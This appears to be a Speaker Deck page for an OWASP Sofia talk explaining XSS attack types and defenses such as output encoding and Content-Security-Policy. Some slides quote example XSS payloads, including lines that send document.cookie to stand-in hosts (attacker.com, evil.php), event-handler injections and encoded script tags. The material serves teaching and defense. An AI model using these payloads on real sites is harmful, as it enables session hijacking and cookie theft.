Upgrade to Pro — share decks privately, control downloads, hide ads and more …

[OWASP Sofia] Dimitar Boyanov - XSS Attacks and Defenses (27th of April, 2021)

[OWASP Sofia] Dimitar Boyanov - XSS Attacks and Defenses (27th of April, 2021)

OWASP Sofia chapter presents Dimitar Boyanov from Progress. In this session Dimitar will talk about XSS Attacks:

Attackers have weapons but defenders have strong armor. XSS is one of the most popular and dangerous attacks for web applications. All XSS types will be explained and defenses in-depth will be presented.

Dimitar Boyanov is a web developer with more than 15 years of experience. Leading developer and one of the founders of Sitefinity Security Team in Progress. Author of many defenses part of the leading CMS.

Level: Mid/Advanced Web Programming

Meeting details: Mihail is inviting you to a scheduled Zoom meeting.

Topic: OWASP Sofia presents XSS Attacks and Defenses by Dimitar Boyanov Time: Apr 27, 07:00 PM Sofia



August 01, 2021


  1. XSS Attacks and Defenses Dimitar Boyanov, dimitar.boyanov@gmail.com Software Engineer, Security,

    Progress April 27, 2021
  2. Agenda  Why  Demo – XSS  What is

    XSS  Types of XSS  Defenses  Demo - CSP  References  Q & A
  3. Why? – XSS in the news March 21, 2021 Multiple

    XSS Vulnerabilities Found In Elementor WordPress Plugin Risked Millions of Websites February 24, 2021 Apple Patched A Stored XSS Vulnerability In iCloud Domain February 12, 2021 Reflected XSS Vulnerability Existed In PayPal Currency Conv erter Wallet
  4. DEMO – XSS Attack  What can be achieved by

    loading a “special” script on a vulnerable site?
  5. OWASP Top 10 (2017) 1. Injection 2. Broken Authentication 3.

    Sensitive Data Exposure 4. XML External Entities (XXE) 5. Broken Access Control 6. Security Misconfiguration 7. Cross-Site Scripting (XSS) 8. Insecure Deserialization 9. Using Components with Known Vulnerabilities 10. Insufficient Logging & Monitoring
  6. Cross-Site Scripting (XSS)- Definition  XSS flaws occur whenever an

    application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user- supplied data using a browser API that can create HTML or JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.  XSS is the second most prevalent issue in the OWASP Top 10, and is found in around two-thirds of all applications.
  7. Cross-Site Scripting (XSS) – Detect, Reflected  Reflected XSS: The

    application or API includes unvalidated and unescaped user input as part of HTML output. A successful attack can allow the attacker to execute arbitrary HTML and JavaScript in the victim’s browser. Typically, the user will need to interact with some malicious link that points to an attacker-controlled page, such as malicious watering hole websites, advertisements, or similar.
  8. Cross-Site Scripting (XSS) – Example, Reflected  Example - Reflected

    XSS:  Core of many phishing schemes  The application uses untrusted data in the construction of the following HTML snippet without validation or escaping: (String) page += "<input name='creditcard' type='TEXT’ value='" + request.getParameter("CC") + “’>”; The attacker modifies the ‘CC’ parameter in the browser to: '><script>document.location='http://www.attacker.com/cgi- bin/cookie.cgi?foo='+document.cookie</script>'
  9. Cross-Site Scripting (XSS) – Detect, Stored  Stored XSS: The

    application or API stores unsanitized user input that is viewed at a later time by another user or an administrator. Stored XSS is often considered a high or critical risk.
  10. Cross-Site Scripting (XSS) - Detect  DOM XSS: JavaScript frameworks,

    single-page applications, and APIs that dynamically include attacker-controllable data to a page are vulnerable to DOM XSS. Ideally, the application would not send attacker- controllable data to unsafe JavaScript APIs. Typical XSS attacks include session stealing, account takeover, MFA bypass, DOM node replacement or defacement (such as trojan login panels), attacks against the user's browser such as malicious software downloads, key logging, and other client-side attacks.
  11. Cross-Site Scripting (XSS) - Attacks  Attack vectors – Reflected

    (Request), Persisted (DB), External (CDN) <body onload=alert('test1’)> <b onmouseover=alert('Wufff!')>click me!</b> <img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);> <IMG SRC=j&#X41vascript:alert('test2')> <SCRIPT type="text/javascript"> var addr = '../evil.php?cakemonster=' + escape(document.cookie); </SCRIPT>
  12. Cross-Site Scripting (XSS) - Attacks <? php print "Not found:

    " . urldecode($_SERVER["REQUEST_URI"]); ?> http://testsite.test/file_which_not_exist http://testsite.test/<script>alert("TEST");</script>
  13. Cross-Site Scripting (XSS) - Question What is this?  %3C%73%63%72%69%70%74%3E

     &#x3C; &#x73; &#x63; &#x72; &#x69; &#x70; &#x74; &#x3E;  &#60&#115&#99&#114&#105&#112&#116&#62  +ADw-SCRIPT+AD4- <script>
  14. Cross-Site Scripting (XSS) - Defenses  Validation  Data Preparation

     Output encoding  Header protections (defense-in-depth)
  15. Cross-Site Scripting (XSS) – Defenses - Validation  Blacklist 

    Whitelist  Indirect selection  Parse  Regular expressions
  16. Cross-Site Scripting (XSS) – Defenses – Data Preparation  Encoding

     HTTP Response - content-type: text/html; charset=utf-8;  HTML encoding <head> <meta charset="UTF-8"> </head>
  17. Cross-Site Scripting (XSS) – Defenses – Output Encoding  Specific

    to each injection context  HTML Еlement  HTML Attribute  URL  Javascript  CSS  HTML comment
  18. Cross-Site Scripting (XSS) – Defenses – Header Protections Header protections

    (defense-in-depth)  HttpOnly flag  Cookies cannot be access from javascript  Content-Security-Policy  Declare which dynamic resources are allowed to load.  script-src, style-src, img-src, connect-src, font-src, etc.
  19. CSP Header Official Spec: https://www.w3.org/TR/CSP3/ Site: https://content-security-policy.com/  CSP Header

    utilizes modern browsers’ built-in XSS protections  Strong defense-in-depth protection.  It was designed to prevent XSS.  Reduce XSS risks on modern browsers by declaring, which dynamic resources are allowed to load  It can remove the “cross” part of the “cross-site-scripting”  Still not widely used. Only ~6% of top 1M sites use it by 2020.
  20. CSP Fetch Directives  CSP Fetch Directives - control the

    locations from which certain resource types may be loaded.  default-src – fallback (all)  script-src – restricts the locations from which scripts may be executed  connect-src - directive restricts the URLs which can be loaded using script interfaces  child-src - directive governs the creation of nested browsing contexts (e.g., iframe)  worker-src - restricts the URLs which may be loaded as a Worker, SharedWorker, or ServiceWorker  font-src, frame-src, img-src, media-src, object-src, style-src
  21. CSP – Other Directives  Document Directives - control the

    locations from which certain resource types may be loaded.  Navigation Directives  form-action - restricts the URLs which can be used as the target of a form submissions from a given context.  frame-ancestors - restricts the URLs which can embed the resource using frame, iframe, object, or embed.  Protects from Clickjacking and Phishing attacks  navigate-to - restricts the URLs to which a document can initiate navigations by any means  Reporting Directives
  22. Demo – CSP Sitefinity CSP directives

  23. How to Discover XSS - Tools  HTTP Proxies (Burp,

    ZAP)  Static/Dynamic Scanners (Veracode, IBM App Scan)  Vulnerable libraries (Dependency Check, Retire.js)  Penetration testing
  24. Demo – XSS game  http://xss-game.appspot.com/

  25. Summary  XSS allows attackers to execute scripts  Protections

     Validation  Data Preparation  Output encoding  Header protections (defense-in-depth) - CSP
  26. Q & A

  27. Thank You! Now It’s Your Turn!